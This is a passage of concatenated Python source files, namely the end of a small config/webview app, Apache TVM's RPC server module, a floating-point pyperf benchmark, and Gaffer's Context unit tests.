f.write('app_name App\n\n')
f.write('window_width 500\n\n')
f.write('window_height 500\n\n')
f.write('server_ip localhost\n\n')
f.write('server_port 8000\n\n')
f.write('server_log false\n\n')
f.close()
def read_ini(self):
cfg_file = open(self.config_name)
cfg = [ln.strip().split(' ',1) for ln in cfg_file if ln[:1].isalpha()]
cfg = dict(cfg)
cfg_file.close()
return cfg
def main():
config = Config()
app = App(config)
app.server_enable()
app.webview()
app.server_disable()
if __name__ == '__main__':
main()
|
server.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""RPC server implementation.
Note
----
Server is TCP based with the following protocol:
- Initial handshake to the peer
- [RPC_MAGIC, keysize(int32), key-bytes]
- The key is in format
- {server|client}:device-type[:random-key] [-timeout=timeout]
"""
# pylint: disable=invalid-name
from __future__ import absolute_import
import os
import ctypes
import socket
import select
import struct
import logging
import multiprocessing
import subprocess
import time
import sys
import signal
from .._ffi.function import register_func
from .._ffi.base import py_str
from .._ffi.libinfo import find_lib_path
from ..module import load as _load_module
from ..contrib import util
from . import base
from . base import TrackerCode
logger = logging.getLogger('RPCServer')
def _server_env(load_library, work_path=None):
"""Server environment function return temp dir"""
if work_path:
temp = work_path
else:
temp = util.tempdir()
# pylint: disable=unused-variable
@register_func("tvm.rpc.server.workpath")
def get_workpath(path):
return temp.relpath(path)
@register_func("tvm.rpc.server.load_module", override=True)
def load_module(file_name):
"""Load module from remote side."""
path = temp.relpath(file_name)
m = _load_module(path)
logger.info("load_module %s", path)
return m
libs = []
load_library = load_library.split(":") if load_library else []
for file_name in load_library:
file_name = find_lib_path(file_name)[0]
libs.append(ctypes.CDLL(file_name, ctypes.RTLD_GLOBAL))
logger.info("Load additional library %s", file_name)
temp.libs = libs
return temp
def _serve_loop(sock, addr, load_library, work_path=None):
"""Server loop"""
sockfd = sock.fileno()
temp = _server_env(load_library, work_path)
base._ServerLoop(sockfd)
if not work_path:
temp.remove()
logger.info("Finish serving %s", addr)
def _parse_server_opt(opts):
# parse client options
ret = {}
for kv in opts:
if kv.startswith("-timeout="):
ret["timeout"] = float(kv[9:])
return ret
def _listen_loop(sock, port, rpc_key, tracker_addr, load_library, custom_addr):
"""Listening loop of the server master."""
def _accept_conn(listen_sock, tracker_conn, ping_period=2):
"""Accept connection from the other places.
Parameters
----------
listen_sock: Socket
The socket used by listening process.
tracker_conn : connnection to tracker
Tracker connection
ping_period : float, optional
ping tracker every k seconds if no connection is accepted.
"""
old_keyset = set()
# Report resource to tracker
if tracker_conn:
matchkey = base.random_key(rpc_key + ":")
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey), custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
else:
matchkey = rpc_key
unmatch_period_count = 0
unmatch_timeout = 4
# Wait until we get a valid connection
while True:
if tracker_conn:
trigger = select.select([listen_sock], [], [], ping_period)
if not listen_sock in trigger[0]:
base.sendjson(tracker_conn, [TrackerCode.GET_PENDING_MATCHKEYS])
pending_keys = base.recvjson(tracker_conn)
old_keyset.add(matchkey)
# if match key not in pending key set
# it means the key is acquired by a client but not used.
if matchkey not in pending_keys:
unmatch_period_count += 1
else:
unmatch_period_count = 0
# regenerate match key if key is acquired but not used for a while
if unmatch_period_count * ping_period > unmatch_timeout + ping_period:
logger.info("no incoming connections, regenerate key ...")
matchkey = base.random_key(rpc_key + ":", old_keyset)
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey),
custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
unmatch_period_count = 0
continue
conn, addr = listen_sock.accept()
magic = struct.unpack("<i", base.recvall(conn, 4))[0]
if magic != base.RPC_MAGIC:
conn.close()
continue
keylen = struct.unpack("<i", base.recvall(conn, 4))[0]
key = py_str(base.recvall(conn, keylen))
arr = key.split()
expect_header = "client:" + matchkey
server_key = "server:" + rpc_key
if arr[0] != expect_header:
conn.sendall(struct.pack("<i", base.RPC_CODE_MISMATCH))
conn.close()
logger.warning("mismatch key from %s", addr)
continue
else:
conn.sendall(struct.pack("<i", base.RPC_CODE_SUCCESS))
conn.sendall(struct.pack("<i", len(server_key)))
conn.sendall(server_key.encode("utf-8"))
return conn, addr, _parse_server_opt(arr[1:])
# Server logic
tracker_conn = None
while True:
try:
# step 1: setup tracker and report to tracker
if tracker_addr and tracker_conn is None:
tracker_conn = base.connect_with_retry(tracker_addr)
tracker_conn.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("<i", base.recvall(tracker_conn, 4))[0]
if magic != base.RPC_TRACKER_MAGIC:
raise RuntimeError("%s is not RPC Tracker" % str(tracker_addr))
# report status of current queue
cinfo = {"key" : "server:" + rpc_key}
base.sendjson(tracker_conn,
[TrackerCode.UPDATE_INFO, cinfo])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
# step 2: wait for in-coming connections
conn, addr, opts = _accept_conn(sock, tracker_conn)
except (socket.error, IOError):
# retry when tracker is dropped
if tracker_conn:
tracker_conn.close()
tracker_conn = None
continue
except RuntimeError as exc:
raise exc
# step 3: serving
work_path = util.tempdir()
logger.info("connection from %s", addr)
server_proc = multiprocessing.Process(target=_serve_loop,
args=(conn, addr, load_library, work_path))
server_proc.deamon = True
server_proc.start()
# close from our side.
conn.close()
# wait until server process finish or timeout
server_proc.join(opts.get("timeout", None))
if server_proc.is_alive():
logger.info("Timeout in RPC session, kill..")
server_proc.terminate()
work_path.remove()
def _connect_proxy_loop(addr, key, load_library):
key = "server:" + key
retry_count = 0
max_retry = 5
retry_period = 5
while True:
try:
sock = socket.socket(base.get_addr_family(addr), socket.SOCK_STREAM)
sock.connect(addr)
sock.sendall(struct.pack("<i", base.RPC_MAGIC))
sock.sendall(struct.pack("<i", len(key)))
sock.sendall(key.encode("utf-8"))
magic = struct.unpack("<i", base.recvall(sock, 4))[0]
if magic == base.RPC_CODE_DUPLICATE:
raise RuntimeError("key: %s has already been used in proxy" % key)
elif magic == base.RPC_CODE_MISMATCH:
logger.warning("RPCProxy do not have matching client key %s", key)
elif magic != base.RPC_CODE_SUCCESS:
raise RuntimeError("%s is not RPC Proxy" % str(addr))
keylen = struct.unpack("<i", base.recvall(sock, 4))[0]
remote_key = py_str(base.recvall(sock, keylen))
opts = _parse_server_opt(remote_key.split()[1:])
logger.info("connected to %s", str(addr))
process = multiprocessing.Process(
target=_serve_loop, args=(sock, addr, load_library))
process.deamon = True
process.start()
sock.close()
process.join(opts.get("timeout", None))
if process.is_alive():
logger.info("Timeout in RPC session, kill..")
process.terminate()
retry_count = 0
except (socket.error, IOError) as err:
retry_count += 1
logger.warning("Error encountered %s, retry in %g sec", str(err), retry_period)
if retry_count > max_retry:
raise RuntimeError("Maximum retry error: last error: %s" % str(err))
time.sleep(retry_period)
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
msg += out
raise RuntimeError(msg)
class Server(object):
"""Start RPC server on a separate process.
This is a simple python implementation based on multi-processing.
It is also possible to implement a similar C based server with
TVM runtime which does not depend on the python.
Parameters
----------
host : str
The host url of the server.
port : int
The port to be bind to
port_end : int, optional
The end port to search
is_proxy : bool, optional
Whether the address specified is a proxy.
If this is true, the host and port actually corresponds to the
address of the proxy server.
use_popen : bool, optional
Whether to use Popen to start a fresh new process instead of fork.
This is recommended to switch on if we want to do local RPC demonstration
for GPU devices to avoid fork safety issues.
tracker_addr: Tuple (str, int) , optional
The address of RPC Tracker in tuple(host, ip) format.
If is not None, the server will register itself to the tracker.
key : str, optional
The key used to identify the device type in tracker.
load_library : str, optional
List of additional libraries to be loaded during execution.
custom_addr: str, optional
Custom IP Address to Report to RPC Tracker
silent: bool, optional
Whether run this server in silent mode.
"""
def __init__(self,
host,
port=9091,
port_end=9199,
is_proxy=False,
use_popen=False,
tracker_addr=None,
key="",
load_library=None,
custom_addr=None,
silent=False):
try:
if base._ServerLoop is None:
raise RuntimeError("Please compile with USE_RPC=1")
except NameError:
raise RuntimeError("Please compile with USE_RPC=1")
self.host = host
self.port = port
self.libs = []
self.custom_addr = custom_addr
self.use_popen = use_popen
if silent:
logger.setLevel(logging.ERROR)
if use_popen:
cmd = [sys.executable,
"-m", "tvm.exec.rpc_server",
"--host=%s" % host,
"--port=%s" % port]
if tracker_addr:
assert key
cmd += ["--tracker=%s:%d" % tracker_addr,
"--key=%s" % key]
if load_library:
cmd += ["--load-library", load_library]
if custom_addr:
cmd += ["--custom-addr", custom_addr]
if silent:
cmd += ["--silent"]
# prexec_fn is not thread safe and may result in deadlock.
# python 3.2 introduced the start_new_session parameter as
# an alternative to the common use case of
# prexec_fn=os.setsid. Once the minimum version of python
# supported by TVM reaches python 3.2 this code can be
# rewritten in favour of start_new_session. In the
# interim, stop the pylint diagnostic.
#
# pylint: disable=subprocess-popen-preexec-fn
self.proc = subprocess.Popen(cmd, preexec_fn=os.setsid)
time.sleep(0.5)
elif not is_proxy:
sock = socket.socket(base.get_addr_family((host, port)), socket.SOCK_STREAM)
self.port = None
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
logger.info("bind to %s:%d", host, self.port)
sock.listen(1)
self.sock = sock
self.proc = multiprocessing.Process(
target=_listen_loop, args=(
self.sock, self.port, key, tracker_addr, load_library,
self.custom_addr))
self.proc.deamon = True
self.proc.start()
else:
self.proc = multiprocessing.Process(
target=_connect_proxy_loop, args=((host, port), key, load_library))
self.proc.deamon = True
self.proc.start()
def terminate(self):
"""Terminate the server process"""
if self.use_popen:
if self.proc:
os.killpg(self.proc.pid, signal.SIGTERM)
self.proc = None
else:
if self.proc:
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
|
bm_float.py
|
"""
Artificial, floating point-heavy benchmark originally used by Factor.
"""
from six.moves import xrange
import multiprocessing as mp
from mpkmemalloc import *
import os
import gc
import threading
import psutil
import pyperf
from math import sin, cos, sqrt
POINTS = 100000
class Point(object):
__slots__ = ('x', 'y', 'z')
def __init__(self, i):
self.x = x = sin(i)
self.y = cos(i) * 3
self.z = (x * x) / 2
def __repr__(self):
return "<Point: x=%s, y=%s, z=%s>" % (self.x, self.y, self.z)
def normalize(self):
x = self.x
y = self.y
z = self.z
norm = sqrt(x * x + y * y + z * z)
self.x /= norm
self.y /= norm
self.z /= norm
def maximize(self, other):
self.x = self.x if self.x > other.x else other.x
self.y = self.y if self.y > other.y else other.y
self.z = self.z if self.z > other.z else other.z
return self
def maximize(points):
next = points[0]
for p in points[1:]:
next = next.maximize(p)
return next
def benchmark(n):
points = [None] * n
for i in xrange(n):
points[i] = Point(i)
for p in points:
p.normalize()
return maximize(points)
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
if allocate_pkey:
pkey_thread_mapper(tname)
runner = pyperf.Runner(loops=1)
runner.metadata['description'] = "Float benchmark"
points = POINTS
runner.bench_func('float', benchmark, points)
del runner
pymem_reset()
process = psutil.Process(os.getpid())
print((process.memory_full_info().pss)/1024.0) # in bytes
def dummyFunc(name):
pass
def main(params):
# pymem_setup_allocators(0)
gc.disable()
workers = len(params) if (len(params)>0) else 1
runner = pyperf.Runner(loops = 1)
runner.argparser.add_argument("--cases")
runner.bench_func("Dummy init", dummyFunc, "main")
del runner
threads = []
for i in range(workers):
tname = 'Worker' + str(i)
threads.append(mp.Process(target=functionWorker, args=[tname,0], name=tname))
for idx, thread in enumerate(threads):
thread.start()
thread.join()
pymem_reset_pkru()
result = {}
for activation in params:
result[activation] = "Finished thread execution"
process = psutil.Process(os.getpid())
print((process.memory_full_info().pss)/1024.0) # in bytes
return(result)
if __name__ == '__main__':
out = main({'activation1':{},'activation3':{},'activation4':{}, 'activation2': {},
'activation31':{},'activation33':{},'activation34':{}, 'activation32': {},
'activation45':{},'activation46':{},'activation47':{}, 'activation48': {}})
|
ContextTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import imath
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
def testFrameAccess( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c["frame"], 1.0 )
c.setFrame( 10.5 )
self.assertEqual( c.getFrame(), 10.5 )
self.assertEqual( c["frame"], 10.5 )
def testChangedSignal( self ) :
c = Gaffer.Context()
changes = []
def f( context, name ) :
self.assertTrue( context.isSame( c ) )
changes.append( ( name, context.get( name, None ) ) )
cn = c.changedSignal().connect( f )
c["a"] = 2
self.assertEqual( changes, [ ( "a", 2 ) ] )
c["a"] = 3
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ) ] )
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# when an assignment makes no actual change, the signal should not
# be triggered again.
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# Removing variables should also trigger the changed signal.
del changes[:]
c.remove( "a" )
self.assertEqual( changes, [ ( "a", None ) ] )
del c["b"]
self.assertEqual( changes, [ ( "a", None ), ( "b", None ) ] )
def testTypes( self ) :
c = Gaffer.Context()
c["int"] = 1
self.assertEqual( c["int"], 1 )
self.assertEqual( c.get( "int" ), 1 )
c.set( "int", 2 )
self.assertEqual( c["int"], 2 )
self.assertIsInstance( c["int"], int )
c["float"] = 1.0
self.assertEqual( c["float"], 1.0 )
self.assertEqual( c.get( "float" ), 1.0 )
c.set( "float", 2.0 )
self.assertEqual( c["float"], 2.0 )
self.assertIsInstance( c["float"], float )
c["string"] = "hi"
self.assertEqual( c["string"], "hi" )
self.assertEqual( c.get( "string" ), "hi" )
c.set( "string", "bye" )
self.assertEqual( c["string"], "bye" )
self.assertIsInstance( c["string"], str )
c["v2i"] = imath.V2i( 1, 2 )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertEqual( c.get( "v2i" ), imath.V2i( 1, 2 ) )
c.set( "v2i", imath.V2i( 1, 2 ) )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertIsInstance( c["v2i"], imath.V2i )
c["v3i"] = imath.V3i( 1, 2, 3 )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertEqual( c.get( "v3i" ), imath.V3i( 1, 2, 3 ) )
c.set( "v3i", imath.V3i( 1, 2, 3 ) )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertIsInstance( c["v3i"], imath.V3i )
c["v2f"] = imath.V2f( 1, 2 )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertEqual( c.get( "v2f" ), imath.V2f( 1, 2 ) )
c.set( "v2f", imath.V2f( 1, 2 ) )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertIsInstance( c["v2f"], imath.V2f )
c["v3f"] = imath.V3f( 1, 2, 3 )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertEqual( c.get( "v3f" ), imath.V3f( 1, 2, 3 ) )
c.set( "v3f", imath.V3f( 1, 2, 3 ) )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertIsInstance( c["v3f"], imath.V3f )
def testCopying( self ) :
c = Gaffer.Context()
c["i"] = 10
c2 = Gaffer.Context( c )
self.assertEqual( c2["i"], 10 )
c["i"] = 1
self.assertEqual( c["i"], 1 )
self.assertEqual( c2["i"], 10 )
def testEquality( self ) :
c = Gaffer.Context()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
self.assertFalse( c != c2 )
c["somethingElse"] = 1
self.assertNotEqual( c, c2 )
self.assertFalse( c == c2 )
def testCurrent( self ) :
# if nothing has been made current then there should be a default
# constructed context in place.
c = Gaffer.Context.current()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
# and we should be able to change that using the with statement
c2["something"] = 1
with c2 :
self.assertTrue( Gaffer.Context.current().isSame( c2 ) )
self.assertEqual( Gaffer.Context.current()["something"], 1 )
# and bounce back to the original
self.assertTrue( Gaffer.Context.current().isSame( c ) )
def testCurrentIsThreadSpecific( self ) :
c = Gaffer.Context()
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
def f() :
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
with Gaffer.Context() :
pass
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
t = threading.Thread( target = f )
t.start()
t.join()
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
self.assertFalse( c.isSame( Gaffer.Context.current() ) )
def testThreading( self ) :
# for good measure, run testCurrent() in a load of threads at
# the same time.
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = self.testCurrent )
t.start()
threads.append( t )
for t in threads :
t.join()
def testSetWithObject( self ) :
c = Gaffer.Context()
v = IECore.StringVectorData( [ "a", "b", "c" ] )
c.set( "v", v )
self.assertEqual( c.get( "v" ), v )
self.assertFalse( c.get( "v" ).isSame( v ) )
self.assertEqual( c["v"], v )
self.assertFalse( c["v"].isSame( v ) )
def testGetFallbackValue( self ) :
c = Gaffer.Context()
self.assertEqual( c.get( "f" ), None )
self.assertEqual( c.get( "f", 10 ), 10 )
c["f"] = 1.0
self.assertEqual( c.get( "f" ), 1.0 )
def testReentrancy( self ) :
c = Gaffer.Context()
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
with c :
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
def testLifeTime( self ) :
c = Gaffer.Context()
w = weakref.ref( c )
self.assertTrue( w() is c )
with c :
pass
del c
self.assertIsNone( w() )
def testWithBlockReturnValue( self ) :
with Gaffer.Context() as c :
self.assertIsInstance( c, Gaffer.Context )
self.assertTrue( c.isSame( Gaffer.Context.current() ) )
def testSubstitute( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
self.assertEqual( c.substitute( "${badlyFormed" ), "" )
def testSubstituteTildeInMiddle( self ) :
c = Gaffer.Context()
self.assertEqual( c.substitute( "a~b" ), "a~b" )
def testSubstituteWithMask( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "~", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.TildeSubstitutions ), "~" )
self.assertEqual( c.substitute( "#", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "#" )
self.assertEqual( c.substitute( "$a/${b}", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.VariableSubstitutions ), "$a/${b}" )
self.assertEqual( c.substitute( "\\", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.EscapeSubstitutions ), "\\" )
self.assertEqual( c.substitute( "\\$a", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.EscapeSubstitutions ), "\\apple" )
self.assertEqual( c.substitute( "#${a}", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "#apple" )
self.assertEqual( c.substitute( "#${a}", IECore.StringAlgo.Substitutions.NoSubstitutions ), "#${a}" )
def testFrameAndVariableSubstitutionsAreDifferent( self ) :
c = Gaffer.Context()
c.setFrame( 3 )
# Turning off variable substitutions should have no effect on '#' substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.VariableSubstitutions ), "003.$frame" )
# Turning off '#' substitutions should have no effect on variable substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "###.3" )
def testInternedStringVectorDataSubstitutions( self ) :
c = Gaffer.Context()
c["test1"] = IECore.InternedStringVectorData( [ "a", "b" ] )
c["test2"] = IECore.InternedStringVectorData()
self.assertEqual( c.substitute( "${test1}" ), "/a/b" )
self.assertEqual( c.substitute( "${test2}" ), "/" )
def testNames( self ) :
c = Gaffer.Context()
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond" ] ) )
c["a"] = 10
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc = Gaffer.Context( c )
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc["b"] = 20
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a", "b" ] ) )
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
self.assertEqual( cc.names(), cc.keys() )
@GafferTest.TestRunner.PerformanceTestMethod()
def testManyContexts( self ) :
GafferTest.testManyContexts()
def testGetWithAndWithoutCopying( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
# we should be getting a copy each time by default
self.assertFalse( c["test"].isSame( c["test"] ) )
# meaning that if we modify the returned value, no harm is done
c["test"].append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )
# if we ask nicely, we can get a reference to the internal
# value without any copying.
self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
# but then if we modify the returned value, we are changing the
# context itself too. this should be avoided - we're just doing it
# here to test that we are indeed referencing the internal value.
c.get( "test", _copy=False ).append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )
def testGetWithDefaultAndCopyArgs( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )
def testCopyWithSharedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# both contexts reference the same object, but c2 at least owns
# a reference to its values, and can be used after c1 has been
# deleted.
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )
del c1
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
def testCopyWithBorrowedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# check that c2 doesn't own a reference
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# make sure we delete c2 before we delete c1
del c2
# check that we're ok to access c1 after deleting c2
self.assertEqual( c1["testInt"], 20 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsReleasesReference( self ) :
c1 = Gaffer.Context()
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )
def testHash( self ) :
c = Gaffer.Context()
hashes = [ c.hash() ]
c["test"] = 1
hashes.append( c.hash() )
c["test"] = 2
hashes.append( c.hash() )
c["test2"] = "test2"
hashes.append( c.hash() )
self.assertEqual( len( hashes ), 4 )
self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )
c["test2"] = "test2" # no change
self.assertEqual( c.hash(), hashes[-1] )
def testChanged( self ) :
c = Gaffer.Context()
c["test"] = IECore.StringVectorData( [ "one" ] )
h = c.hash()
cs = GafferTest.CapturingSlot( c.changedSignal() )
d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
d.append( "two" )
self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
self.assertEqual( len( cs ), 0 )
c.changed( "test" ) # let the context know what we've been up to
self.assertEqual( len( cs ), 1 )
self.assertEqual( cs[0], ( c, "test" ) )
self.assertNotEqual( c.hash(), h )
def testHashIgnoresUIEntries( self ) :
c = Gaffer.Context()
h = c.hash()
c["ui:test"] = 1
self.assertEqual( h, c.hash() )
@GafferTest.TestRunner.PerformanceTestMethod()
def testManySubstitutions( self ) :
GafferTest.testManySubstitutions()
@GafferTest.TestRunner.PerformanceTestMethod()
def testManyEnvironmentSubstitutions( self ) :
GafferTest.testManyEnvironmentSubstitutions()
def testEscapedSubstitutions( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( r"\${a}.\$b" ), "${a}.$b" )
